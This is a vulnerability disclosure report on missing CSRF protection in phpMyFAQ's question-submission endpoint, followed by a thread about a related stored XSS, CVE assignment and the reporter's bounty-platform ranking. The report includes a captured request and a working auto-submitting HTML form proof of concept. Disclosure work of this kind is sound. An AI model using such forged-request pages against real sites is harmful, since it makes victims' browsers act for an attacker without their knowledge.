Missing CSRF protection in thorsten/phpmyfaq
Reported on
Nov 24th 2022
Description
Any user can Add Questions on FAQ section --> https://roy.demo.phpmyfaq.de/index.php?action=ask&category_id=0
This section is vulnerable to CSRF. The aggressor can abuse this without prior knowledge of others'. The successful CSRF will send new questions from the victim's browser
Captured Request
POST /ajaxservice.php?action=savequestion HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=<ID-VALUE>; pmf_sid=22383; cookieconsent_status=dismiss; phpbb3_6zg4_u=1; phpbb3_6zg4_k=; phpbb3_6zg4_sid=68a52c0cd02a54757d476703488f677a
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 82
Sec-Gpc: 1
Te: trailers
lang=en&name=Demouser&email=demouser%40phpmyfaq.de&category=13&question=Execute-4?
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://roy.demo.phpmyfaq.de/ajaxservice.php?action=savequestion" method="POST">
<input type="hidden" name="lang" value="en" />
<input type="hidden" name="name" value="Demouser" />
<input type="hidden" name="email" value="demouser@phpmyfaq.de" />
<input type="hidden" name="category" value="13" />
<input type="hidden" name="question" value="Execute-4?" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
PoC Video
Link --> https://drive.google.com/file/d/1uIOoJ-mg17hZutheEbUW3umI1WlU_vLP/view?usp=sharing
Impact
Attacker sends his/her/their queries, including abusive words by exploiting other clients
Occurrences
index.php L0
(Sorry about this. It's tested from demo version)
The CSRF isn't the big issue here, but the stored XSS in the admin section.
If you get its potential, then you can track it as a bug & fix the case
Regards,
Why can't we go for a CVE if it's have a potential impact?
Just let me know
@admin
The CSRF bug was therebut the major selected by maintainer so I received a minor penalty (unfair)
And my credibility is decreased to 2.7 even after this discovery. I hope you can do some adjustment and help to boost my label "pro" to "master"
regards,
@admin @maintainer
Yeah, Then please assign a CVE for this one: CWE-79: Cross-site Scripting (XSS) - Stored
@Maintainer, Can you please do a favor for me? the admin is not responding here. Please track a CVE for this bug!
Regards,
@7h3h4ckv157 how can I do that? Never did that before.
@Maintainer I guess you can see that on your UI. Else, let's wait for @admin
Thanks, @admin
But please assist with this 👇🏻
The CSRF bug was there but the major was selected by the maintainer so I received a minor penalty (unfair)
And my credibility decreased to 2.7 even after this discovery. I hope you can do some adjustments and help to boost my label "pro" to "master"
@maintainer I appreciate that. But I don't know what's wrong. Now my credibility decreased from 2.7 to 2.6 🙂
@admin Seriously I've no idea about the backend function!
If the CWE or CVSS are inaccurate, your credibility takes a minor hit. Let's resolve this on chatwoot via Chat with us :)
As requested, this report will now receive a CVE on publication :)
@admin
NIST: NVD Base Score: 5.4 MEDIUM
There's nothing that went wrong on my side. Kindly do something to fix my rank.
Regards,